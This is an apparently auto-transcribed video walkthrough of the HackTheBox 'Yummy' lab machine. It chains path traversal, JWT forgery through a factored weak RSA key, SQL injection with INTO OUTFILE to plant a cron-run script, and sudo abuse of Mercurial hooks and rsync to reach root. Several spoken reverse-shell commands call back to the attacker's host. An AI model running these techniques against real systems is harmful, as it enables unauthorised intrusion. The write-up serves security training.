HackTheBox - Yummy
Key Takeaways
This video demonstrates how to hack the Yummy machine on HackTheBox, exploiting vulnerabilities such as file disclosure, JWT vulnerability, and SQL injection, using tools like Nmap, Burp Suite, and RSA encryption.
Full Transcript
what's going on YouTube this is IPC and today we'll be doing yummy from hack the box which the foothold is a bit of a mess because right off the bat the web application has multiple vulnerabilities but in order to do anything meaningful you'll have to combine all the vulnerabilities which are three or four right the first is a file disclosure vulnerability which lets you download the source code you can also see crons that are running on the server and if you inspect the crons you'll discover that if you can write data to the dis of the server you can likely get code execution the second vulnerability is a JWT assigned via RSA with a weak secret that you can quickly Factor so you can manipulate the JWT and say you're administrator and being administrator lets you access um some end points and one of them is vulnerable to SQL injection and finally the fourth vulnerability my SQL is configured to enable right access to the dis so you can do that SQL injection write data to the disk exploit the KRON and get a shell as my SQL and then exploit a different KRON to get shell as dubdub duub data and from there there's several GTFO bins explaining Mercurial HG and Earth sync to get up to the root user so with that being said let's jump in as always we can start off with an end map so d c for default scripts SV enumerate versions dvv for double re this gives us things like the TTL OA output all formats put the end map directory and call it yummy and then the IP address of 1010 11.36 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and the banner tells us it's an auntu server we also have HTTP on P 80 its Banner tells us it's a caddy web server which is a web server I think it's the direct name goang and the key thing about this web server that I've always used in the past is it just has really good SSL support it like integrates with less en cryp flawlessly but we're seeing it as HTTP and I even know you could run caddy without SSL um a little bit odd that it's using caddy but uh I don't think there's really any like amplifications of that so the other thing we see it's redirecting us to yummy. hdb so let's go ahead and add this to our host so we do pseudo V Etsy host and then add 10101 11.36 put in yummy. htb save that exit and then let's just go take a look at the website so let's do HTTP yummy. htb and we get it looks like a online restaurant so it looks like it's a single page thing if we just click around um we're just going to Anchor tags with everything uh there's login register book a table but before we get into the actual website I want to try to like figure out what framework it's using or what like is under the hood so I'm just going to grab something that doesn't exist because four or four pages are great for identifying things and this error message is um definitely going to be python flask so I'm defin like one of the main reasons I want to check this out is because it was using the caddy web server a lot of gol applications like caddy so maybe it was written in go which um would change up how I approach the web app um attacks just because it's slightly different than Python and again if it was PHP then I would try like a lot of like file create vulnerabilities if you drop a PHP file on the web server it's easy code execution like every language kind of has its quirks so we know this is flask if you didn't memorize the 404 error Pages you could Google like 404 o xdf cheat sheet and then that should bring you to let's see these this cheat sheet page default 404 pages and then you could look around to see exactly what it looks like this one is flask and we can see it is identical I think I have it on my clipboard I do not we could just grab this uh let's go back over to his page paste it and yep definitely going to be flask so we know this is a python app so let's go ahead and see exactly um what the functionalities are so we could log in we we can register we can also book a table so if we go to the book a table we can do the name let's do IPC root atp. Ro phone number uh let's do all fives uh the date's fine time let's do two message and I'm going to do image source is equal to and we're going to direct it to myself and right here I'm just testing for basic um cross-site scripting right so slash image and we should stand up a net listener on Port 80 let's click Reserve table and we see request was sent we can manage our appointment from our account and nothing but we don't have an account so we can't really manage our appointment so I'm going to go ahead and register let's do root ic. password of password and I'm also curious exactly how this talks to the application so I'm going to this over to burp Suite just so uh we can intercept and look at things so the register request is just sending Json we sent email and password nothing interesting there um user registered successfully so let's go ahead and log in root atp. roxs password of password and we get logged in and we can see it looks like it's doing HTML encoding because we can see the greater than and or the less than and greater than symbols here I bet if I went into the inspector and inspected this that's not what I expected we see did it decode the HTML entities let's do control U to open the source code 10 104 there we go so it's definitely encoded this is what's preventing the cross-site scripting I did not know the inspector tab would not show that encoding that's interesting to me but definitely not vulnerable to cross-site scripting we do see the manage reservation has a cancel reservation option and if I look at this we turn intercept on click cancel I'm not actually going to send it I just want to talk about something here that I find somewhat interesting it's doing delete 21 um I would expect this to be like reservation 21 and then the HTTP verb would be delete um this is just I think the more modern way to handle it one of the benefits is a lot of like automated scanners won't use the HTTP verb delete at least I think that's the correct verb to use um HTTP verbs let's turn verb Suite off make sure I'm saying the right things but yeah I think there should be a delete verb right um there we go hold on oh this was a good list actually so we see get head post put delete connect options trace and Patch so one of the benefits to using the delete verb is a lot of automated scanners won't ever send this because as it stands right now if we did get reservation and there was an idore vulnerability and our automated scanner did not really realized this was delete and it delete one delete two delete three delete four and this was an ID draw vulnerability meaning we could delete other people's reservations then we just essentially delete the database um so I always like putting using the HTTP verbs when dealing with like an API but that's a tangent for another day let's just drop this request and go back to the page so looking at dashboard there is a save ey calendar so if we click on this it's going to say something went wrong I guess maybe a reservation went away wow um I don't know if that's like a Cron job that cleaned it up or maybe I accidentally sent the delete uh let's just create a new one and I'm actually going to intercept this request and we will put it on the repeater tab just so we have it right so let's go burp htb intercept is on reserve table that's in repeater I'm going to rename this to um Reserve table using the tabs and naming things is definitely handy and sweet so now if I go to dashboard we have this we can save to I calendar and it wants to save to the file yummy reservation. I if we save it um we can move Let's Do download star. I over here and C the file we can see what it is and I think IC is like um I calendar share or something it's some file format for calendars and we see its product ID is I.P it directs us over to this GitHub link which is just a open-source python library for managing um calendar invites you could look at the source to see if there's any vulnerabilities here I'm not going to do that just for sake of time we can look at exi tool on it as well and that's also going to leak that it's I.P but there's not too much interesting here but if we looked at exactly the request flow then it becomes interesting so I'm going to turn intercept on we're going to save the invite and we see first it makes a request to reminder 21 and then it makes this export request and that's when the file download comes so let's go ahead and send both of these to repeater okay cancel and then if we just try this IC request it's going to get a internal server error because we have to set the reminder first so we have to send this request then we can send this and potentially get the file I guess maybe the date is slightly wrong if we look it wants us to export this file yeah the time changed and we didn't do the reservation first so this is going to be set reminder and this is download IC so I'm going to do control minus and that's going to go back one Tab and Control Plus goes up one tab so it's a quick way to switch tabs I'm going to send the reminder then I'm going to try testing for um file disclosure we'll do a directory traversal first so the 2f that is just SL URL encoded and when we do whenever testing for file disclosures I always do 2s first and the whole logic behind that is sometimes the router and the actual application will terminate on slash so right now this is going to the export and this is a function right if there's another function defined here it's going to stop at the first dot dot slash and say I don't exist um so putting it as URL encoded just helps kind of prevent that right so we're going to do that and we get file not found because I have a period there we go I did Etsy do dop passwd so we'll set the reminder download ICS and we get past WD we can URL decode this and try it again just to see if that URL encoding was needed and turns out it wasn't so um it's just something I always try you never know exactly when you need it so now let's go ahead and see if we can download the environment file so I'm going to set the reminder and then I'm going to do proc self Environ like that and we get a 200 okay but nothing if the file doesn't exist we get a 404 not found so the environment file did exist uh one trick you can do that sometimes works I don't think it works in this case is set the range header so we do range byes is equal to 0 through 8 and we still get an empty file we could just set like 1 just in case the very first bite of the file um was bad and we still get nothing the other thing I guess we could do is try finding where app.py exist and in Python at least flask it's normally going to be like run.py app.py and there's I think one other one but I can't remember it you could try guessing at do/ but one of the things I like doing is just using proc self CWD and we can specify app.py and we just get one letter and that's because I left this range header right if we did btes let's do 0o through eight we're going to get the first I think nine characters right like that so let's just get rid of this range header because we definitely don't want that run set and there we go we have app.py and we could begin looking at this for vulnerabilities um the first thing I notic here in the DB config the client flag I'm not used to seeing this but we have client multi statements and what this enables is stacked queries if you Googled it you'd find that out but essentially what a stacked query is if this is a first SQL query the Stacked would let us do semicolon and write a second query or a third query right so that's what the Stacked is going to do so we can um write new queries at the end you don't need this to exploit the box but definitely makes things a little bit easier um let's see if we go to the login function let's see what we have um it's going to grab the um build the JWT here and it's grabbing the RSA from this um signature if we went up we would see where signature is so I'm just going to search for Signature and we see from config import signature so this is going to be a directory and then um the python file so we could actually I'm going to let's see copy the file let's go htb yummy I'm going to call this app.py just so we have it set the reminder we'll do CWD and then it config signature. piy run this and it's doing a manual implementation of our ass say and these primes are very low um I also think like some of them should be the same I don't know RSA that well but this is vulnerable if you send it to chat gbt it would tell you additionally if you just looked at the JWT and looked at the value for n so VN this is the value and this number itself is relatively small um I want to say like when dealing with RSA I'm used to numbers this big so just seeing this is a alarm in itself and let's see do we have chat GPT let's just search that I think it's chat gb. open.com or something uh buru is on so I will disable it that's just for the request go here and then let's see um in RSA would this be a secure value forn and paste it and it's asking the question waiting I don't know why it's not outputting maybe it's just going to display everything at the end um like where it's going slow but that number is relatively low I'm going to pause the video and we're going oh no there we go so let's see so it's approximately 308 digits which is around 1,24 bits it wants to be probably 20 48 bits um so we can easily Factor this which means we could generate our own um keys I guess we should just do that now since we're talking about it there's like few steps in this exploit so it's kind of hard just to walk through and talk about everything but let's just go here real quick um do I still have that on my clipboard there it is so I'm going to do CD opt rsaf tool and let's do source. VM bin activate and we can do Python 3 rsaf tool. piy I'm going to give it the value of N and then the public exponent 65537 this is just always well almost always going to be the case in RSA uh you could look at the file let's c e yep is set to that but that's a super common public exponent and you can see how quickly it can Factor this number we get p and Q so we could say um D- create Pub and I'll go htb yummy first for this we will copy this opt RSA CTF tool like that there we go and we have created a public key so if I copy this public key V uh we'll call this jb. Pub paste that now I'm going to do-- private it's going to create us a private key and this can be used to sign the JWT which means we can edit variables so I'm going to call this jw. pem put this copy it and then you could go to a tool like j. but this actually isn't going to work um I'm on the version two of this this is the beta version if you go into your cookies on this website I know it's going to be really weird but if you do cookies go to the um AB variant and change it from control to variant it will change what version of JWT iio you're on so this is the one that I think you're most familiar with if we tried putting everything here I don't think it's going to work and it's not as clear with error messages so we can put that there going to open up the console tab let's go ahead and Cat the pub uh cat jb. Pub grab this copy paste could not load the key um expected I don't know exactly why that failed but we could also try the private real quick cat JT I called it pem copy paste and again it can't load it and errors out so I followed the instructions we eventually landed on going to the beta version if we look at this it's going to be a bit more clear why it fails so we'll copy this paste it in oh man the layout what is going on there control shift R there we go so it want the public key here so let's go ahead and Cat j3 t. Pub copy paste and this is still invalid signature I expected this to say it didn't support um RSA keys that were not 248 bit as the airor message I was expecting but we just get operation cannot be performed um not exactly sure why but this whole tool just doesn't work for weak RSA Keys um you could use gen JWT python I think is this a GitHub script Pi JWT U maybe it's JWT toolkit python is this it I for getet the python script to do it um how I ended up doing was I Googled online JWT tool and let's see I went to a different one and this one just works so I'm going to go ahead copy the cookie paste it in and then we need to get the private and public key again I already got the public right here so we can copy this I wonder if it wants a line break actually no uh public paste let let's cat jbt P grab this and let's really hope this works click the check mark jbt signature has been valid and time are valid so everything works here so we can change the RO if we went back to app.py uh let's delete the header I'm just going to search for roll and see where it gets set so right here it's sending customer and then secret token hex um let's see oh I missed it if we go back roll there we go another role is administrator so if we set the role to be administrator go back copy let's go back to our thing going to go in my storage and then we going to change our JWT this is going to be the one that has the new role Refresh on dashboard it redirects us to admin dashboard and we have all these reservations so if we look at what we can do from admin dashboard let's search this let's see delete and looking at it we discover what looks like an SQL injection right away and it's not displaying that well in this terminal let's see if I go back a little bit I know the indent screwed up but what we see is a passing a variable into the SQL and then doing execute like this and this is not parameterized at yeah this field is uh the SQL but um this is not if we look at how other functions were working let's just look at execute we can see percent s percent s and they're passed like this and when it's done this way it's not SQL injectable because the application knows these are parameters because it's passed as hey this is a string this is a string we're passing it into execute and saying hey don't let it um email escape this right but when we go with how it's done here and this execute it just doesn't know because we wrote the query into the raw SQL so that is vulnerable and since stat queries is it's going to make this trivial to exploit but before we exploit it I'm going to do something else because it is needed for rce and if we don't um it's just going to be jumping all over the place place and not make sense if for some reason um it makes sense to begin with so if we went back here where the file disclosure was I'm going to grab the KRON tab so if we do Etsy KRON tab we can see it failed completely probably because our reservation isn't even there so let's reserve the table set the reminder download it and there we go now we can see Aon tab and there are a few scripts so we have this app backup we have table cleanup and DB monitor so if we view this data scripts at backup that's going to be the first one I grab so I'm going to paste this set the reminder send it we can see what it's doing it's going to ver dubdub duub deleting backup app. zip and then creating a new one so let's go ahead and just download this file so this is ver dubdub duub and then backup app so set reminder download come on it's thinking I okay there it is so let's copy the file and I'm going to call this um backup. zip I guess then we'll vedit it delete these headers and and then if we do a file on it there we go um I'm going to make a directory backup let's go in here 7zip x backup. zip and then if we go in opt app we have the entire application source code here so if you didn't want to manually export each file as we showed in the file disclosure you can do it this way and then also if you um send it through a tool like sneak sneak will find the um SQL injection vulnerability for you right but this isn't why I showed the cron tab there's another cron if we go back here the data scripts DB monitor that runs every minute let's look at this one real quick so going to save run this and then I'm just going to copy this into a file let's just copy a file dbm monitor. sh VDB monitor there it is I had only copied what I had highlighted let's try copying this again so DB monitor yes it exists that's it's fine open it there we go so what this is doing is let's see if the response to this is not active then it's going to check if this file exist and if it does exist it's going to check if the string database is down there if it is it's just going to Echo a bunch of things if that string does not exist in there it's going to delete the status. Json and then it's going to do a LS on datas scripts fixer DV um sort it and then grab the last one and then execute it so if we can create a file here data scripts vixer DV let's say 100sh and then create the DB status. Json file it's going to execute every single minute so that's where knowing that SQL injection is going to come in hand so I think we're admin here and let's see let's go proxy intercept we'll click search I'm not on Burp Suite search send it and this is where the SQL injection was and we actually don't need stat queries to make this work but the stat queries does make it easier like we could do um select please subscribe into outfile was it Dev scripts I'll call it ipac I think this will work so if I send this then we set the reminder we can try downloading the file IPC and file not found oh we it was data scripts internal server error I thought we would be able to read that huh let's see I try without a stacked quer real quick into out file data scripts IPC save it run it still get an error I wonder if we have like a permission error if I do IPC ASD do I get a file not found I do so I must not have permission to read this file that is creating okay so we have verified it creates a file because it should file not found if we don't have access but since we're getting a 500 error I'm guessing that means the file exists we just can't read it which makes sense because the database is writing this file so let's go back real quick and what I'm going to do is we can say select and then let's do b-c b-i Dev TCP 1010 14 8 9,1 0 and 1 like that kill that that's fine let's URL encode this and then what did we need named I think it was like fixer DV I'll do 99. sh that should be saved and then we also need to create DB status. Json um we need to listen on Port 90001 first okay and DB status. Json create that and then we just wait for that cron to hit um looking at the server time we have 24 so probably in about 30 seconds a new minute should happen and that's when um we'll get the code execution so hopefully in about probably 20 seconds we'll get this and I guess while we wait uh let's see do I have that backup DB monitor. sh I do so was it fixer yep we have it we got the shell already so if I go Dev scripts do we have or data scripts I do have that IC file and that's what we did please subscribe so again if we do lsla on IPC we can see only the my SQL user has access to read this file I wonder even I put in vdd it would still be the same so we just can't drop the SQL to a file and then run it but I did say that we didn't need stat queries to make this work and the reason why is if we look back at the source code let's scroll all the way down let's see where is it right here so this is Sneak telling me we have SQL injection here but what it's doing is selecting star from appointments where appoint email like this and what we could do is create an appointment that has command injection right so if I do Reserve table and let's see for the message I'm going to put the command execution here so we'll just do b-c then Bashi Dev TCP 101148 then 91 0 and 1 like that and then we'll do a semicolon again when it executes bash on this it's going to just execute right so we'll Reserve that table then go back here and we'll just do into out file and then we need to name the file as well fixer v99 run that and then we wait a minute let's see that query when was that done at 53 may have missed it I think I did see 08 let's do DB status. Json and then I'm going to pause the video and I'm going to sleep for 30 seconds and we did not get a hit which is a little bit odd I'm going to get a sh the way we did before and just look through what we were doing um that's not it I think this is the thing we did that's writing into there we go this should be it run that DB status. Json run this and when was that done 52 so in a couple seconds we should get a sh hopefully I should have a sh now what broke that's not good I'm hting myself for killing the shell I had from my sequel before so let's see we do the sort we do select bash C bash I Dev TCP 10104 148 91 0 and 1 and to outfile I think it's DB status. Json right let's take a look at that file again maybe I screwed up a file name so data scripts fixer DV so we'll do fixer DV I did not 9sh and then DB status. Json I'm just making sure make both of these okay I'm going to sleep again and we'll see if I get a shell back awesome here we are we have the shell so I'm going to redo what I did before but um we're going to keep this shell active so we can actively troubleshoot if something goes wrong um let's do export term is equal to X term now I can close screen so I go data scripts then let's see I'm going to um what is it oh we want to go back here and all I want to do is send it into this file um into out file like that so cat ipac we just have Please Subscribe if I do IAC 2 do I not have permission to overwrite it there we go we have all the files there I wonder if I just can't overwrite files let's change it to sending so I'm the last one this should now make me the first one I'm not the first one am I the first one here I am or we could do head-1 to prove it so with this we actually can overwrite files which is a little bit odd so that's what error I ran into before but what we wanted to do um let's do ascending and out file and we could say fixer DV bunch of nsh and before we do that we go back to the set reminder we're going to create the bash script here then run this and then I'm going to do DB status. Json create that file make sure we're listening uh 53 I probably missed the window do it again catdb status. Json there we go we have the file and I see what mistake I did I did not URL encode it so it treated the Ampersand and terminated everything so what we wanted to do is go back here we can highlight this URL en code and then we see the mistake we made so let's do I'm just going to write it to LOL and if we cat LOL oh that was export my bad we'll do fixer V LOL there we go so when it's Ur encoded it actually works and if bash executes this it's going to get like invalid command invalid command all these invalid commands and then it's going to get to here and then send us the reverse shell so um always important to remember to do URL encoding so lesson learned okay let's go back into Etsy Chron tab real quick and if we look at let's see data scripts we have that we have a potential password here so we could do um MySQL dasu Chef proba Local Host DP put in the password um copy this there we go show tables um select star from users and we don't have any users here uh we could do select star from appointments like that that and list all the appointments but since there are no users there's no hashes we can extract I guess the administrator doesn't have credentials here doesn't really matter um let's see C Etsy Chron tab one thing I'm noticing is these are my SQL which is our user we also have a dub dubdub datacron writing here and if we do lsla on data we can see scripts is CH moded 777 which means we can edit this file even if we don't have permission to so if we do lsla we see at backup it's owned by root and we can't edit it so if we did V backup. sh write it read only a set I wonder if we can oh we can overwrite it um I didn't think Vim would let us do that but what's Happening Here is um since the whole directory is 777 we can edit this file right you could move this to be like this and if we do LS we have successfully deleted at backup. sh and then we can create a new file but I want to try something real quick I want just try the Vim thing so we'll do V backup. sh and then I'm going to add b-i Dev TCP 101048 9,10 and one like that and then we can kill this window save it with a force uh over right exit we V it maybe not b-i Dev TCP 10 104 eight zero and one yes okay so it does work so we can successfully overwrite the file with a it got reverted already that's weird um move app backup let's move it there v b bash D- I Dev TCP 101048 90001 save it and there we go once the new minute hits it executes and we get a shell I want to say maybe there's a cleanup script reverting this because if we C it again we see it's reverted so what probably happened before is it reverted before I actually executed it and that's why so if it doesn't work for you try it a couple times and try it like at second 45 and then see if it works because I think there's like an overzealous cleanup script happening right there but now we're also the dubdub duub data user so let's do python 3-c import PTY PTY spawn bin bash stty raw minus Echo forr export term is equal to X term now I can clear the screen and if we look at this directory let's see what we have we have this app QA testing we have backup app if I go into QA testing we have a HG directory we cd. HG uh we have a bunch of things and this is kind of like GitHub or a git directory um let's see what is a HG file Google turn off and let's see it is just another like package repository you can see right and let's see HG show that's not what I want to do hdel Lo andit pull push commit graph branches diff grap that's probably log let's do HD log there we go so what this is doing is kind of like a git log command it's showing all the changes made to this so we have patched SQL um injection vulnerability signature vulnerability so this is the QA testing so this is probably not the app we're looking for um let's see I wonder if we can do HG diff can we just do seven let's see HG d-h how do we specify a change set probably- C there we go and is this adding a SQL injection vulnerability I want to say green is ADD so they remove that and [Music] then I don't think this is patching the SQL injection vulnerability oh so they use they say use paramed queries here right but um they're not doing that they're just doing a comparison to make sure that variable is equal to ascending or descending so that's how it got patched um okay that kind of makes sense I guess uh let's do HG log we can look at like what remove comments means so if we do HGD 8 we have a different credential for this so this is the database credential then we have the QA and we got this password and if we cat Etsy pass WD grip everything that ends in sh we see QA is a user so if we do su QA put in that new password the jpad we get access to the QA user so I'm going to try sh QA yummy htb paste this in there we go I always like just getting SS when I can because it's more stable than the reverse shell additionally if the Box gets reverted I can just get right back to where I started or left off so if we look at what our user can do with the pseudo- L we'll paste in the password we have which was that jpad whatever we can see we can run the command HG pool home app or home Dev app production as the dev user and we don't know if we do LS home Dev we can't access them but if we do LS l we can see in our current working directory we have a hgrc file this is going to be just like um how HG um Works under the hood and if we did a man hgrc we can pull the man page for it and the global config is going to be home hgrc we can see on Unix the following files are also consulted um the repo HG HG RC repo HG hgr C so we have a few extra files right this is going to be the user one but if we create an HG repo and then create the hgrc file we can have access to this and within the hgrc we have a feature called hooks so if we do HG hooks let's see if we get anything right here so we have a hook on a Comm it I want to say there's other hooks we can do is there a hook in here important hooks um we have change group update I bet we just did a hook on change group that may work incoming autobuild so yeah uh let's see change group what is it going to do the change group Hook is activated once for each Push Pull un bundle so this is probably what we want we want to create the hgrc file and then create this hook so let's go back here I'm going to go in Dev shm and then we'll going to do a HG a nit to create a directory and what we also want to do is I'm going to Cod everything to 777 in this because we have to be able to run this as the user um so there we go let's go in.hg do we have a hgrc file we don't um lsla is it dot I can't remember if it's hgrc or not yeah it's hgrc so we do v. hgrc and then go back here create this hook paste it and then we want to execute something so I'm going to call um I should just leave everything there we'll do Dev shm shell. sh and then VD shm shell. sh bin bash Bashi Dev TCP 10148 901 and one like that sod we'll give it all sevens listen on 90001 and I think this may work c-l let's try this uh permission denied pseudo CH U chod d777 HG oh um we need pseudo- uev there we go and it pulled it but it did not execute a hook b. HG hdrc so I wonder if our Hook is bad let's do Dev shm shell sh we validated that file works so it's probably within our hook I'm going to check one thing real quick there's no period it's just hgrc it's a period when it's in the home directory but in a repo it's not uh move hgrc like that no changes found let's just recreate this real quick um HG anit CP HG HG RC then C Mod this sudo command again and it's still not working so I think our Hook is bad so v. HG hgrc what oh man clear that HG AET move hgrc HG chod pseudo there we go our Hook was not bad we just did not place the hgrc in the correct directory so it's definitely important um where you place it right and now we have a shell as Dev and we see I'm out of the office until February 20th it is currently the 19th um not sure if that's relevant but hey let's do CD home lsla cdsh there's no keys here I'm going to do sh key gen DH D help Ed I want to do ed25519 one day I'll memorize that s key gen- t-f I'm going to call this Dev cd. Pub I just like the Ed 2519 because it's a much shorter public key uh let's go back to where a Dev shell is and then we can Echo that to authorize Keys okay Cod 600 on that file and then sh- Dev Dev yummy. htb and there we go now we have a shell I'm going to close that one out and let's see we can try another sudo shell and see on route or as route we can run our sync um with some flags and the big mistake here is the star here allowing us to do things it's intended to only allow us to copy um every file out of app production but this wild cut also matches spaces which allows us to inject commands into our sync now the standard go to would be go to GTFO bins then search for rsync and then see with a um pseudo we should be able to specify d e so we should be able to do something like this and get a shell so if we try that we'll do pseudo copy this then we go and add the Das e flag whoops there we go and then we also have to add what's after the opt app so if we try this oh nothing happens let's see that should just be executing a shell right let's do nclv NP 901 Dev shm shell. sh that's from earlier right that's just a reverse shell so if it was executing um we'd get a call back right because if we execute Dev shm shell sh boom so that works but it doesn't work with the our syn Command and I think it's because we need to have a remote file path and if we try to add that like this um we get unexpected remote argument we do man or sync let's do sl- e what is it no let uppercase yeah it's specify the remote shell to use use so I think when coping to a remote location it changes to a different shell but I think the opt app at the end of it is definitely screwing it up um I wonder if we do devnull op app is that actually going to work uh no because we need a space after the wild card and the pseudo rule so we can't execute that way if we looked at other functionalities of um rsync we have a way to do a CH own there's also I think we covered in different video with- capital L uh to copy links that would also work but I'm going to use the CH own because we can take ownership of a file so what I'm going to do is let's see I'm going to p-l let's look at this command again home app prodction so I'm going to copy bin bash into home Dev at production and I'll call it IPC and then we're going to chod 4755 on this file so what that's going to do is set the um set uid bit so we can um change the owner and now what we want to do is the ryn command I'm doing this all in one command in case something like some cleanup script runs and then screws it up right it's always handy just to do this in one big one um we're going to add the file what was it IPC and I'm going to set the earner is equal to root root like that oh no it was CH own right I think it was CH own let's see [Music] um per Mission denied let's see CP Ben bash C own Dev Dev on home Dev app production hipc try this oh I'm not running pseudo here that's why I was giv permission error let's take that CH out there we go so now if I go opt app we see IPC is there it's ch own to root and we have the set uid if I do stat IPC it's not there it already got cleaned up we can see 4755 so if I execute that add the- P flag we are now effectively root because um we copy that as bash bash DP will obay set uid bit which was set right so we can go into SL root and now we have everything here so one thing I want to do is talk a little bit about the changes made to my sequel because in most modern Ubuntu systems my SQL actually can't write files so let's just talk about some of those changes to do that I'm going to add my authorized key over here so let's C uh was it dev. Pub and then I'm going to copy this then we can Echo this over to authorized keys and s-i Dev we'll do root at yummy. htb there we go so if we go Etsy MySQL if we cat myql.com I think uh we're including this directory hold on my SQL d comp we see this secure file priv and by default um let's actually Google what this is real quick we want to probably just search my SQL let's see trying to find a good article on it okay maybe this is fine um essentially the secure file priv is normally set and it only allows my SQL to write into whatever directory this is I forget what the default directory is but it's definitely not going to be SL data it's some directory in like ver lib MySQL probably ver lib so my SQL directory um maybe it's not this there is a directory that MySQL can normally only write into so by setting that to be nothing that disables the mysecure file priv that allows us to um read and write everywhere there's also a second thing that blocks us on default Ubuntu and that's app armor so if we do um what it system CTL status app armor I can see app armor is uh disabled and inactive if we started app armor so we do system start app armor and then we do system CTL restart my SQL I think that will do it um we should no longer be able to write into the data directory so what I'm going to do is grab this and we'll do app armor and see if we can write but want a to log in again that's annoying so we have to probably create a whole new cookie or do we where is JWT expired 19 minutes ago let's change this to be a 4 copy it over copy because we didn't restart the web service so only the JWT should be fine okay I think that did it I wish we let's see if we do render what's this look like we see cannot write in data script app armor permission denied so that is app Arma blocking us so if we do data scripts we don't see it there if we do ver log um let's see probably CIS log sc-i app app active g-r I deny so it's an audit um Laurel I think no that's me running the command I think see name is GP so that's me running the command I bet if we rebooted the entire box then the app armor logs would be displayed I'm not sure why they are not um execve maybe it is denied yeah there it is it's not deny it's denied so we can see the deny here it's an audit log this is going to be audit D my SQL name scripts app armor it got denied I wonder if I do GP denied on CIS log is that there yeah so we see oh this is my pseudo scripts so if we go in Laurel logs it should be here okay right here this ABC app armor denied operation um profile is my SQL and we see data scripts app armor is getting denied so oh and before we end the video the last thing I wanted to show is um CH own removing the set uid bit of a file when you change the owner and rsync not doing that so let's go in Dev shm uh let's copy bin bash over here and we can chod 4755 to bash if we do lsla you can see that has the set u bit if we CH own it to Dev Dev on bash lsla on bash again you can see it removed the set uid bit because the CH binary if you change it it removes special permissions right we could add that back with a chod do lsla we have it CH own root root on bash like that lsla on bash and it's removed right so let's just show that with the um command again so let's go to the Shell I think this is where we did it right R sync yep I'm going to copy this go here let's Su you to what user was executing that Dev yep so we'll switch to Dev and then if we run this let's see we do chod let's do a lsla on home Dev at production IPC like that and something screwed up uh we have it in two commands let's copy this paste on the end there we go that's the command so we copy bash into app production and call it IPC we give IPC set u ID then we're going to LS it to see the um Privileges and let's see yeah so we can see the IPC binary has say um set u ID and then when the CH own comes if we do lsla opt app it's already gone can we just do opt app IPC like this there we go so you can see it's here then when ryn copies it copies it to this directory does the CH own to change the owner and when it does the CH own it still does not remove the um special bit so this paring is behaving slightly differently than Chon so with that being said that's going to be the video hope you guys enjoyed it take care and I'll see you all next time
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:55 - Playing around with the website, booking a table and then registering an account
08:40 - Taking a look at the Save to iCalendar functionality and finding a File Disclosure vulnerability
12:15 - Finding the application source code via the /proc/self/cwd directory
14:15 - The JWT does RSA manually, using a weak exponent, showing we can factor this with RsaCtfTool
18:40 - Showing JWT.IO doesn't work with weak RSA Keys, showing an alternative tool
26:10 - Looking at cron jobs, finding all of the source code
28:20 - The DBMonitor Cron looks like it will execute code if we create specific files in the /data/scripts directory
33:50 - Using INTO OUTFILE with our SQL Injection to write files and exploit the DBMONITOR Cron to get a shell
41:30 - Shell returned looking at the database, then exploiting another cron because we can write a file
45:20 - Looking at the commit history of an Mercurial HG repo and finding a password
49:05 - We can run HG PULL as dev, showing there are multiple places we can put a HGRC file and create a repo with a hook that will execute a script on pull
57:05 - We can run rsync as root, but the standard gtfobin doesn't work
1:00:00 - Showing the chown flag doesn't remove setuid bits in RSYNC, which lets us make setuid files
1:03:00 - BEYOND ROOT: Showing the changes to the box (secure_file_priv and AppArmor) that allows MySQL To Write files
1:08:49 - Showing the CHOWN removes SetUID but Rsync does not when changing owners
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related Reads
Chapters (17)
Introduction
1:00
Start of nmap
3:55
Playing around with the website, booking a table and then registering an accou
8:40
Taking a look at the Save to iCalendar functionality and finding a File Disclo
12:15
Finding the application source code via the /proc/self/cwd directory
14:15
The JWT does RSA manually, using a weak exponent, showing we can factor this w
18:40
Showing JWT.IO doesn't work with weak RSA Keys, showing an alternative tool
26:10
Looking at cron jobs, finding all of the source code
28:20
The DBMonitor Cron looks like it will execute code if we create specific files
